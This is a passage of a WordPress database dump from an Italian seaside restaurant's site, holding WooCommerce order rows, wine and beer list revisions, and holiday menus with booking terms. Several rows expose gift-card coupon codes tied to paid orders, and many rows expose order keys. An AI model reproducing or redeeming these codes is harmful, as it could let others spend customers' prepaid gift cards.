ecc.\n','Caparra','','inherit','closed','closed','','875-autosave-v1','','','2019-07-25 06:49:21','2019-07-25 04:49:21','',875,'https://www.ristorantesolymar.it/2019/07/25/875-autosave-v1/',0,'revision','',0),(884,1,'2019-07-25 06:54:53','2019-07-25 04:54:53','','coupon-716','','inherit','open','closed','','coupon-716','','','2019-07-25 06:54:53','2019-07-25 04:54:53','',875,'https://www.ristorantesolymar.it/wp-content/uploads/2019/07/coupon-716.jpg',0,'attachment','image/jpeg',0),(885,1,'2019-07-25 06:56:13','2019-07-25 04:56:13',' ','','','publish','closed','closed','','885','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',0,'https://www.ristorantesolymar.it/?p=885',33,'nav_menu_item','',0),(886,1,'2019-07-27 16:35:47','2019-07-27 14:35:47','','Order &ndash; Luglio 27, 2019 @ 04:35 PM','','wc-processing','open','closed','wc_order_kdf6WlXheopph','ordine-jul-27-2019-0235-pm','','','2019-07-27 16:40:18','2019-07-27 14:40:18','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=886',0,'shop_order','',2),(887,1,'2019-08-09 15:56:10','2019-08-09 13:56:10','','Order &ndash; Agosto 9, 2019 @ 03:56 PM','','wc-processing','open','closed','wc_order_ZRoFHaI4JI4ow','ordine-aug-09-2019-0156-pm','','','2019-08-09 15:57:23','2019-08-09 13:57:23','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=887',0,'shop_order','',2),(888,1,'2019-08-14 13:11:16','2019-08-14 11:11:16','','Order &ndash; Agosto 14, 2019 @ 01:11 PM','','wc-processing','open','closed','wc_order_NrfFexgQCqkqF','ordine-aug-14-2019-1111-am','','','2019-08-14 13:12:48','2019-08-14 11:12:48','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=888',0,'shop_order','',2),(889,1,'2019-08-14 16:25:34','2019-08-14 14:25:34','','Order &ndash; Agosto 14, 2019 @ 04:25 PM','','wc-cancelled','open','closed','wc_order_8NGhZ2KEh6G39','ordine-aug-14-2019-0225-pm','','','2019-08-14 17:12:44','2019-08-14 15:12:44','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=889',0,'shop_order','',1),(890,1,'2019-08-14 16:34:40','2019-08-14 14:34:40','','Order &ndash; Agosto 14, 2019 @ 04:34 PM','','wc-cancelled','open','closed','wc_order_YTHL5lV61fX1T','ordine-aug-14-2019-0234-pm','','','2019-08-14 17:12:45','2019-08-14 15:12:45','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=890',0,'shop_order','',1),(891,1,'2019-08-14 16:40:38','2019-08-14 14:40:38','','Order &ndash; Agosto 14, 2019 @ 04:40 PM','','wc-processing','open','closed','wc_order_FevMKO8kk6uWC','ordine-aug-14-2019-0240-pm','','','2019-08-14 16:44:00','2019-08-14 14:44:00','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=891',0,'shop_order','',2),(892,0,'2019-08-14 16:44:01','2019-08-14 14:44:01','GIFTCARD ORDER #891','solymarcouponKM6AW','GIFTCARD ORDER #891','publish','closed','closed','','solymarcouponkm6aw','','','2019-08-14 16:44:01','2019-08-14 14:44:01','',0,'https://www.ristorantesolymar.it/2019/08/14/solymarcouponkm6aw/',0,'shop_coupon','',0),(893,1,'2019-10-02 20:07:12','2019-10-02 18:07:12','','Order &ndash; Ottobre 2, 2019 @ 08:07 PM','','wc-processing','open','closed','wc_order_FWXNCFXDBTd3z','ordine-oct-02-2019-0607-pm','','','2019-10-02 20:09:52','2019-10-02 18:09:52','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=893',0,'shop_order','',2),(894,0,'2019-10-02 20:09:54','2019-10-02 18:09:54','GIFTCARD ORDER #893','solymarcouponWKFDN','GIFTCARD ORDER #893','publish','closed','closed','','solymarcouponwkfdn','','','2019-10-02 20:09:54','2019-10-02 18:09:54','',0,'https://www.ristorantesolymar.it/2019/10/02/solymarcouponwkfdn/',0,'shop_coupon','',0),(895,1,'2019-10-17 18:25:45','2019-10-17 16:25:45','','Order &ndash; Ottobre 17, 2019 @ 06:25 PM','','wc-processing','open','closed','wc_order_Gj0ITiqYWoWny','ordine-oct-17-2019-0425-pm','','','2019-10-17 18:33:40','2019-10-17 16:33:40','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=895',0,'shop_order','',2),(896,1,'2019-10-31 13:31:18','2019-10-31 12:31:18','','Order &ndash; Ottobre 31, 2019 @ 01:31 PM','','wc-cancelled','open','closed','wc_order_kCt6a8dPKLIfJ','ordine-oct-31-2019-1231-pm','','','2020-06-17 09:57:37','2020-06-17 07:57:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=896',0,'shop_order','',1),(897,1,'2019-10-31 13:51:23','2019-10-31 12:51:23','','Order &ndash; Ottobre 31, 2019 @ 01:51 PM','','wc-processing','open','closed','wc_order_J0faEha4FhEBW','ordine-oct-31-2019-1251-pm','','','2019-10-31 13:59:23','2019-10-31 12:59:23','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=897',0,'shop_order','',2),(899,2,'2019-11-03 18:43:31','2019-11-03 17:43:31','<p style=\"text-align: left\"><strong>VINO DELLA CASA</strong></p>\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi        Albiano Verdicchio dei castelli di Jesi  Bott.  O, 750 l           € 10,00\r\n\r\nVallona                     Pignoletto Frizzante D.O.C. Bott.     O,750 l                      € 14,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\">LE NOSTRE PROPOSTE AL BICCHIERE</p>\r\n&nbsp;\r\n\r\n<strong>BIANCHI</strong>\r\n\r\n<strong> </strong>Marotti Campi               Albiano Verdicchio dei castelli di Jesi         “17          € 4,00\r\n\r\nKossler                            Gewurztraminer                                              “18           €5,00\r\n\r\nDomaine Hameline      Chablis                                                                               € 5,00\r\n\r\nCamminera                    Adarya Vermentino.                                       “17           € 5,00\r\n\r\nRonco dei Tassi             Ribolla Gialla                                                                    € 5,00\r\n\r\n&nbsp;\r\n\r\n<strong>BOLLICINE</strong>\r\n\r\nCantina Leonardo Da Vinci      Pignoletto Spumante                                         € 4,00\r\n\r\n&nbsp;\r\n\r\n<strong>ROSATI</strong>\r\n\r\nMarotti Campi               IGT Marche ROSATO                                                    € 4,00\r\n\r\n<strong> </strong>\r\n\r\n<strong>ROSSI</strong>\r\n\r\n<strong>Per il rosso del giorno chiedere al cameriere    </strong>                                                    € 4,00','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2019-11-03 18:43:31','2019-11-03 17:43:31','',106,'https://www.ristorantesolymar.it/2019/11/03/106-revision-v1/',0,'revision','',0),(900,2,'2020-10-24 22:57:26','2020-10-24 20:57:26','<u>            SOL Y MAR</u>\n\n<u> </u>\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\n<u> </u>\n\n<u> </u>\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\n<strong>                               </strong>\n\nSan Patrignano             Aulente Bianco                                                                  € 9,00\n<p style=\"text-align: center\">Donnafugata                  Anthilia I.G.T.                                                                    € 10,00</p>\n<p style=\"text-align: center\">Umani Ronchi               Verdicchio Casal Di Serra                                                € 10,00</p>\n&nbsp;\n<p style=\"text-align: center\"><strong>Bollicine</strong></p>\n<p style=\"text-align: center\">Laherte Freres            Champagne Brut Ultradition   (assemblage)        € 28,00</p>\n<p style=\"text-align: center\">          Bonnet Gilmert               Champagne BdB Cuvèe de riserve Brut GC                      € 30,00</p>\n<p style=\"text-align: center\">           Jean Vesselle                     Champagne Brut Rosè de Saignèe                                      € 30,00</p>\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\n<strong> </strong>\n\nSan Patrignano              Aulente Rosso                                                              € 9,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','I piccoli formati da 0.375','','inherit','closed','closed','','73-autosave-v1','','','2020-10-24 22:57:26','2020-10-24 20:57:26','',73,'https://www.ristorantesolymar.it/2019/11/03/73-autosave-v1/',0,'revision','',0),(901,2,'2019-11-03 18:54:38','2019-11-03 17:54:38','LE MILLE E UNA BOLLICINA\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Italia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Valle D’Aosta</u></strong>\r\n\r\n<strong><u> </u></strong> Cave de Morgex                             Glacier Extra Brut D.O.C. Valle d’Aosta                    €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n\r\n&nbsp;\r\n\r\nCoppo                                            Luigi Coppo Brut                                                               €25,00\r\n\r\nEttore Germano                          Alta Langa brut D.O.C.                                                     €30,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCantine Montagna                      Pinot nero v.i.b. Oltrepò Pavese D.O.C.                         €15,00\r\n\r\nCà dei Frati                                  Rosè cuveè dei Frati metodo classico                              € 25,00\r\n\r\nCà del Vént                                Brut Rosè Pas Operè millesimo                                        € 42,00\r\n\r\nCà del Vént                                Blanc de Blancs Pas Operé millesimo                              € 60,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\n&nbsp;\r\n\r\nRevì                                            Trento D.O.C. Dosaggio Zero                                                               € 28,00\r\n\r\nTrento D.O.C. Rosè                                                                                 € 28,00\r\n\r\nPaladino Trento D.O.C. millesimo(bio)                                              € 45,00\r\n\r\nPojer e Sandri                          Brut Rosè                                                                                                   € 30,00\r\n\r\nBalter                                         Trento D.O.C. Brut Chardonnay                                                          € 23,00\r\n\r\nLetrari (Talento)                     Trento D.O.C. Brut                                                                                  € 25,00\r\n\r\nTrento D.O.C. dosaggio zero riserva                                                   € 30,00\r\n\r\nFerrari                                       Perlè Trento D.O.C Brut                                                                        € 40,00\r\n\r\nGiulio Ferrari                           Riserva del fondatore Trento D.O.C. Extra Brut                              € 85,00\r\n\r\nPedrotti                                     Trento D.O.C. Brut Millesimato                                                           € 30,00\r\n\r\nTrento D.O.C. Bouquet Brut Nature                                                   € 27,00\r\n\r\nTrento D.O.C. Brut Riserva 12 anni                                                    € 70,00\r\n\r\nCantina Furlani                       Furlani Brut                                                                                             € 21,00\r\n\r\nCantina Furlani                       Furlani Brut Nature                                                                               € 22,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Veneto</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nAdami                                      Prosecco Valdob. D.O.C.G. Brut Bosco di Giga                               € 17,00\r\n\r\nCartizze Valdobbiadene superiore D.O.C.G.                                   € 25,00\r\n\r\nCanevel                                   Campofalco Prosecco Valdo. D.O.C.G. Brut (BIO)                        € 18,00','Le mille e una bollicina','','inherit','closed','closed','','73-revision-v1','','','2019-11-03 18:54:38','2019-11-03 17:54:38','',73,'https://www.ristorantesolymar.it/2019/11/03/73-revision-v1/',0,'revision','',0),(903,2,'2019-11-03 18:59:11','2019-11-03 17:59:11','','3-birra 2-4-19','','inherit','open','closed','','3-birra-2-4-19','','','2019-11-03 18:59:11','2019-11-03 17:59:11','',69,'https://www.ristorantesolymar.it/wp-content/uploads/2019/11/3-birra-2-4-19.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(904,2,'2020-10-24 23:20:13','2020-10-24 21:20:13','<strong><u> Trentino Alto Adige</u></strong>\n\nHartmann Donà              Donà Blanc I.G.T.                                        “11 € 27,0o\n\nKossler                             Gewurztraminer D.O.C.                              “18 € 20,00\n\nGirlan                               Gewurztraminer D.O.C.                             “18 € 20,00\n\nMichele Appiano           Sauvignon St Valentin D.O.C.                   “17 € 32,00\n\nGewurztraminer St Valentin D.O.C.        “17 € 32,00\n\nFalkenstein                     Riesling D.O.C.                                                “16 € 24,00\n\nPinot Bianco D.O.C.                                        “16 € 22,00\n\nSauvignon D.O.C.                                            “16 € 23,00\n\nPeter Dipoli                      Voglar Sauvignon D.O.C.          (NO)            “15 € 26,00\n\nFranz Haas                      Manna Vigneti delle dolomiti I.G.T. (NO) “17 € 26,00\n\n<strong><u>   Veneto</u></strong>\n\nInama                               Vulcaia Fumè Sauvignon IGT                     “16 € 36,00\n\nGiovanni Menti               Riva Arsiglia                                                     “16 € 22,00\n\nCostadilà Bianco             330 SLM non filtrato Costadilà                      € 21,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','Trentino Alto Adige','','inherit','closed','closed','','85-autosave-v1','','','2020-10-24 23:20:13','2020-10-24 21:20:13','',85,'https://www.ristorantesolymar.it/2019/11/03/85-autosave-v1/',0,'revision','',0),(905,2,'2019-11-03 21:42:34','2019-11-03 20:42:34','<u>     SOL Y MAR</u>\r\n\r\n<strong><u>Birre speciali</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>      Ichnusa</strong>\r\n\r\n<strong> </strong>\r\n\r\nCruda                Chiara (sapore secco e beverino) 0,33 l 4,9%                                          €  3,00\r\n\r\n<strong> </strong>\r\n\r\n<strong>       32 via dei birrai</strong>\r\n\r\n<strong> </strong>\r\n\r\nCurmi al farro  (beverina, rinfrescante, lievemente acidula, di medio corpo) 0,750 l 5,8% € 11,50\r\n\r\nOppale ale         (corposa, luppolata, note di caramello) 0,750 l 5,5%                                     € 11,50\r\n\r\n&nbsp;\r\n\r\n<strong>Les Bières Du Grand St. Bernard </strong>\r\n\r\n<strong> </strong>\r\n\r\nNapea               (bassa fermentazione non pastorizzata) 0,330 l 4,8%                        €   6,00\r\n\r\n&nbsp;\r\n\r\n<strong>Giratempo </strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>       </strong>Lelio                    APA bionda, dissetante leggera e secca 0,330 l 4,8%                              €   6,00\r\n\r\nNiimbus             Bionda con il mosto di moscato,piena e profumata 0,330 l 6,2%            €   6,00\r\n\r\n&nbsp;\r\n\r\n<strong>Green Dog</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>       </strong>Crew                   Golden ale alta fermentazione 0,330 l 4,9%                                            €   6,00\r\n\r\n<strong>       </strong>\r\n\r\n<strong>       Il Monticello </strong>\r\n\r\n<strong> </strong>\r\n\r\nCertosa del Montello    alta fermentazione 0,750 l 6,0%                                                     € 11,50\r\n\r\n&nbsp;\r\n\r\n<strong>Maso alto </strong>\r\n\r\n<strong>        </strong>\r\n\r\n<strong>       </strong>Intrepida       Golden Ale alta fermentazione rifermentata in bottiglia 0,330 l 5,0%         €   6,00\r\n\r\n&nbsp;\r\n\r\n<strong> Birra Perugia </strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>     </strong> Birra Calibro 7 Chiara( dai forti richiami agrumati e tropicali) 0,330 l 5,5%                  €   6,00\r\n\r\nGolden ale       Chiara (beverina,profumi freschi e vivaci) 0,330 l 5,2%                       €  6,00\r\n\r\nGolden ale         Chiara (beverina,profumi freschi e vivaci) 0,750 l 5,2%                         € 11,50\r\n\r\n&nbsp;\r\n\r\n<strong>   </strong><strong>Amarcord</strong>\r\n\r\nAma Pilsner       Pilsner non filtrata, bouquet floreale ed erbaceo 0,350 l 4,9%     €   7,00\r\n\r\nAma Golden ale Note fruttate grande eleganza e armonia           0,350 l 6,0%     €   7,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>     Belgio</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong>       </strong><strong>Brasserie Du Bocq </strong>\r\n\r\n<strong> </strong>\r\n\r\nBlanc de Namur ( morbida ,leggermente dolce, rinfrescante)0,750ml 4,5%                   € 11,50\r\n\r\n&nbsp;\r\n<pre></pre>','Birre','','inherit','closed','closed','','69-revision-v1','','','2019-11-03 21:42:34','2019-11-03 20:42:34','',69,'https://www.ristorantesolymar.it/2019/11/03/69-revision-v1/',0,'revision','',0),(906,1,'2019-12-11 16:13:39','2019-12-11 15:13:39','','Order &ndash; Dicembre 11, 2019 @ 04:13 PM','','wc-processing','open','closed','wc_order_gu2aHwJSCIPtc','ordine-dec-11-2019-0313-pm','','','2019-12-11 16:15:09','2019-12-11 15:15:09','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=906',0,'shop_order','',2),(907,0,'2019-12-11 16:15:12','2019-12-11 15:15:12','GIFTCARD ORDER #906','solymarcouponKOHML','GIFTCARD ORDER #906','publish','closed','closed','','solymarcouponkohml','','','2019-12-11 16:15:12','2019-12-11 15:15:12','',0,'https://www.ristorantesolymar.it/2019/12/11/solymarcouponkohml/',0,'shop_coupon','',0),(909,1,'2019-12-11 22:08:23','2019-12-11 21:08:23','<em>Hai pensato a cosa fai a Capodanno ??\r\nNoi si</em>\r\n\r\n<strong>Il Menù</strong>\r\n<em>Entrée di benvenuto\r\n\r\nTonno vitellato\r\nTataki di tonno con jus e maionese di vitello\r\n\r\nSpring roll di sogliola e salsa di pomodorini gialli fermentati\r\n\r\nTriglia al pepe verde, topinambur e aglio nero\r\n\r\nFagottini di broccoli con vongole bottarga e limone\r\n\r\nMazzancolle nostrane, purea di lenticchie e cotechino\r\n\r\n\"Agrumi\"</em>\r\n\r\n60€ bevande escluse\r\n\r\norario inizio\r\nh 21','Menù Cenone di Capodanno 31 dicembre 2019','','publish','open','open','','menu-cenone-di-capodanno-31-dicembre-2019','','','2019-12-11 22:08:23','2019-12-11 21:08:23','',0,'https://www.ristorantesolymar.it/?p=909',0,'post','',0),(910,1,'2019-12-11 22:08:10','2019-12-11 21:08:10','','capodanno2019','','inherit','open','closed','','capodanno2019','','','2019-12-11 22:08:10','2019-12-11 21:08:10','',909,'https://www.ristorantesolymar.it/wp-content/uploads/2019/12/capodanno2019.jpg',0,'attachment','image/jpeg',0),(911,1,'2019-12-11 22:08:23','2019-12-11 21:08:23','<em>Hai pensato a cosa fai a Capodanno ??\r\nNoi si</em>\r\n\r\n<strong>Il Menù</strong>\r\n<em>Entrée di benvenuto\r\n\r\nTonno vitellato\r\nTataki di tonno con jus e maionese di vitello\r\n\r\nSpring roll di sogliola e salsa di pomodorini gialli fermentati\r\n\r\nTriglia al pepe verde, topinambur e aglio nero\r\n\r\nFagottini di broccoli con vongole bottarga e limone\r\n\r\nMazzancolle nostrane, purea di lenticchie e cotechino\r\n\r\n\"Agrumi\"</em>\r\n\r\n60€ bevande escluse\r\n\r\norario inizio\r\nh 21','Menù Cenone di Capodanno 31 dicembre 2019','','inherit','closed','closed','','909-revision-v1','','','2019-12-11 22:08:23','2019-12-11 21:08:23','',909,'https://www.ristorantesolymar.it/2019/12/11/909-revision-v1/',0,'revision','',0),(912,1,'2019-12-16 21:41:15','2019-12-16 20:41:15','','Order &ndash; Dicembre 16, 2019 @ 09:41 PM','','wc-processing','open','closed','wc_order_Jm9txUPRFahNG','ordine-dec-16-2019-0841-pm','','','2019-12-16 21:43:33','2019-12-16 20:43:33','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=912',0,'shop_order','',2),(913,0,'2019-12-16 21:43:35','2019-12-16 20:43:35','GIFTCARD ORDER #912','solymarcouponMV85T','GIFTCARD ORDER #912','publish','closed','closed','','solymarcouponmv85t','','','2019-12-16 21:43:35','2019-12-16 20:43:35','',0,'https://www.ristorantesolymar.it/2019/12/16/solymarcouponmv85t/',0,'shop_coupon','',0),(914,1,'2019-12-18 13:53:55','2019-12-18 12:53:55','','Order &ndash; Dicembre 18, 2019 @ 01:53 PM','','wc-processing','open','closed','wc_order_z8xQRFSjn6tnc','ordine-dec-18-2019-1253-pm','','','2019-12-18 13:54:28','2019-12-18 12:54:28','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=914',0,'shop_order','',2),(915,1,'2019-12-18 14:36:17','2019-12-18 13:36:17','','Order &ndash; Dicembre 18, 2019 @ 02:36 PM','','wc-processing','open','closed','wc_order_g986IQLTbFL1p','ordine-dec-18-2019-0136-pm','','','2019-12-18 14:38:17','2019-12-18 13:38:17','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=915',0,'shop_order','',2),(916,1,'2019-12-18 15:08:30','2019-12-18 14:08:30','','Order &ndash; Dicembre 18, 2019 @ 03:08 PM','','wc-processing','open','closed','wc_order_CcldMd3EA3GYf','ordine-dec-18-2019-0208-pm','','','2019-12-18 15:09:18','2019-12-18 14:09:18','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=916',0,'shop_order','',2),(917,1,'2019-12-18 18:09:31','2019-12-18 17:09:31','','Order &ndash; Dicembre 18, 2019 @ 06:09 PM','','wc-processing','open','closed','wc_order_3sJf2GyXuC7tY','ordine-dec-18-2019-0509-pm','','','2019-12-18 18:11:19','2019-12-18 17:11:19','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=917',0,'shop_order','',2),(918,1,'2019-12-18 18:47:18','2019-12-18 17:47:18','','Order &ndash; Dicembre 18, 2019 @ 06:47 PM','','wc-processing','open','closed','wc_order_LkNw5d3DAGT4h','ordine-dec-18-2019-0547-pm','','','2019-12-18 18:50:19','2019-12-18 17:50:19','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=918',0,'shop_order','',2),(919,1,'2019-12-18 19:30:28','2019-12-18 18:30:28','','Order &ndash; Dicembre 18, 2019 @ 07:30 PM','','wc-processing','open','closed','wc_order_kM8ojW8EzDNfS','ordine-dec-18-2019-0630-pm','','','2019-12-18 19:34:09','2019-12-18 18:34:09','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=919',0,'shop_order','',2),(920,1,'2019-12-18 23:55:08','2019-12-18 22:55:08','','Order &ndash; Dicembre 18, 2019 @ 11:55 PM','','wc-refunded','open','closed','wc_order_rzwMtKQ8LLohF','ordine-dec-18-2019-1055-pm','','','2019-12-22 20:09:07','2019-12-22 19:09:07','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=920',0,'shop_order','',4),(921,1,'2019-12-21 18:58:23','2019-12-21 17:58:23','','Order &ndash; Dicembre 21, 2019 @ 06:58 PM','','wc-processing','open','closed','wc_order_jfnhc85I01QXf','ordine-dec-21-2019-0558-pm','','','2019-12-21 19:01:55','2019-12-21 18:01:55','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=921',0,'shop_order','',2),(922,1,'2019-12-22 12:10:22','2019-12-22 11:10:22','','Order &ndash; Dicembre 22, 2019 @ 12:10 PM','','wc-processing','open','closed','wc_order_hQC4BvJhr5WiX','ordine-dec-22-2019-1110-am','','','2019-12-22 12:12:23','2019-12-22 11:12:23','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=922',0,'shop_order','',2),(923,0,'2019-12-22 12:12:25','2019-12-22 11:12:25','GIFTCARD ORDER #922','solymarcouponEX5WE','GIFTCARD ORDER #922','publish','closed','closed','','solymarcouponex5we','','','2019-12-22 12:12:25','2019-12-22 11:12:25','',0,'https://www.ristorantesolymar.it/2019/12/22/solymarcouponex5we/',0,'shop_coupon','',0),(924,1,'2019-12-22 16:01:33','2019-12-22 15:01:33','','Order &ndash; Dicembre 22, 2019 @ 04:01 PM','','wc-processing','open','closed','wc_order_ide6JzxpToTSO','ordine-dec-22-2019-0301-pm','','','2019-12-22 16:03:52','2019-12-22 15:03:52','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=924',0,'shop_order','',2),(925,1,'2019-12-22 20:09:07','2019-12-22 19:09:07','','Rimborso &ndash; Dec 22, 2019 @ 07:09 PM','','wc-completed','closed','closed','wc_order_DlDKoqVj7hvk9','rimborso-dec-22-2019-0709-pm','','','2019-12-22 20:09:07','2019-12-22 19:09:07','',920,'https://www.ristorantesolymar.it/?shop_order_refund=rimborso-dec-22-2019-0709-pm',0,'shop_order_refund','',0),(926,1,'2019-12-22 20:21:55','2019-12-22 19:21:55','','Order &ndash; Dicembre 22, 2019 @ 08:21 PM','','wc-refunded','open','closed','wc_order_FB2RkAGGOoTtd','ordine-dec-22-2019-0721-pm','','','2020-01-01 20:43:22','2020-01-01 19:43:22','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=926',0,'shop_order','',4),(927,1,'2019-12-23 10:45:09','2019-12-23 09:45:09','','Order &ndash; Dicembre 23, 2019 @ 10:45 AM','','wc-processing','open','closed','wc_order_fXRwdh9rYEESI','ordine-dec-23-2019-0945-am','','','2019-12-23 10:46:45','2019-12-23 09:46:45','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=927',0,'shop_order','',2),(928,0,'2019-12-23 10:46:49','2019-12-23 09:46:49','GIFTCARD ORDER #927','solymarcouponZTFTP','GIFTCARD ORDER #927','publish','closed','closed','','solymarcouponztftp','','','2019-12-23 10:46:49','2019-12-23 09:46:49','',0,'https://www.ristorantesolymar.it/2019/12/23/solymarcouponztftp/',0,'shop_coupon','',0),(929,1,'2019-12-23 16:46:48','2019-12-23 15:46:48','','Order &ndash; Dicembre 23, 2019 @ 04:46 PM','','wc-cancelled','open','closed','wc_order_DUQYancQo0C0E','ordine-dec-23-2019-0346-pm','','','2020-06-17 09:57:37','2020-06-17 07:57:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=929',0,'shop_order','',1),(930,1,'2019-12-23 16:59:31','2019-12-23 15:59:31','','Order &ndash; Dicembre 23, 2019 @ 04:59 PM','','wc-processing','open','closed','wc_order_WjRbe94fiRHyc','ordine-dec-23-2019-0359-pm','','','2019-12-23 17:01:31','2019-12-23 16:01:31','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=930',0,'shop_order','',2),(931,1,'2019-12-23 17:07:13','2019-12-23 16:07:13','','Order &ndash; Dicembre 23, 2019 @ 05:07 PM','','wc-cancelled','open','closed','wc_order_OMF9RyAW96eKI','ordine-dec-23-2019-0407-pm','','','2020-06-17 09:57:37','2020-06-17 07:57:37','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=931',0,'shop_order','',1),(932,1,'2019-12-23 18:42:53','2019-12-23 17:42:53','','Order &ndash; Dicembre 23, 2019 @ 06:42 PM','','wc-processing','open','closed','wc_order_UpFIpYlbqwqwk','ordine-dec-23-2019-0542-pm','','','2019-12-23 18:43:47','2019-12-23 17:43:47','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=932',0,'shop_order','',2),(933,1,'2019-12-28 08:18:24','2019-12-28 07:18:24','','Order &ndash; Dicembre 28, 2019 @ 08:18 AM','','wc-processing','open','closed','wc_order_tgBO44Pi5Cied','ordine-dec-28-2019-0718-am','','','2019-12-28 08:18:55','2019-12-28 07:18:55','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=933',0,'shop_order','',2),(934,1,'2019-12-28 18:02:00','2019-12-28 17:02:00','','Order &ndash; Dicembre 28, 2019 @ 06:02 PM','','wc-processing','open','closed','wc_order_C5FKZTK59tgzy','ordine-dec-28-2019-0502-pm','','','2019-12-28 18:02:27','2019-12-28 17:02:27','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=934',0,'shop_order','',2),(935,1,'2020-01-01 20:43:22','2020-01-01 19:43:22','','Rimborso &ndash; Jan 01, 2020 @ 07:43 PM','','wc-completed','closed','closed','wc_order_6YIbNUq4SCQOG','rimborso-jan-01-2020-0743-pm','','','2020-01-01 20:43:22','2020-01-01 19:43:22','',926,'https://www.ristorantesolymar.it/?shop_order_refund=rimborso-jan-01-2020-0743-pm',0,'shop_order_refund','',0),(936,1,'2020-01-26 12:13:54','2020-01-26 11:13:54','','Order &ndash; Gennaio 26, 2020 @ 12:13 PM','','wc-processing','open','closed','wc_order_descUQ3UZ528e','ordine-jan-26-2020-1113-am','','','2020-01-26 12:14:36','2020-01-26 11:14:36','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=936',0,'shop_order','',3),(943,2,'2020-01-31 12:16:22','2020-01-31 11:16:22','<em>La vita ha due doni preziosi: la bellezza e la verità. La prima l’ho trovata nel cuore di chi ama e la seconda nella mano di chi lavora.\r\n(Khalil Gibran)</em>\r\n\r\nMenù week end di San Valentino\r\nSan Valentino e Cena del 15 -2\r\n\r\n- Entrée di Benvenuto\r\n- Carpaccio di Mazzancolle nostrane, campari, arancio e kefir\r\n- Noci di Capasanta arrostita.crema di finocchio allo zenzero e salicornia\r\n- Calamaro puntarelle e Alici del Cantambrico\r\n- Tortelli di patate e burrata sl ragù di Astice e pomodorini\r\n- Rollé di Sogliola nostrana al tartufo su patata fondente\r\n- Cioccolato bianco lampone e liquirizia\r\n-caffè\r\n\r\n€ 55 a persona bevande escluse\r\nPrenotazione con caparra (obbligatoria )\r\nwww.ristorantesolymar.it\r\n\r\nps: 16-2 dopo 25 anni e 11 mesi di lavoro\r\nchiuderemo per lavori\r\ni dettagli i prossimi giorni\r\nOra pensiamo a festeggiare L\" Amore in tutte le sue forme (anche Amore per il proprio lavoro )\r\n\r\n\r\nModalità di prenotazione online per la cena di San Valentino 2020\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va “tassativamente” compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di mercoledi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le 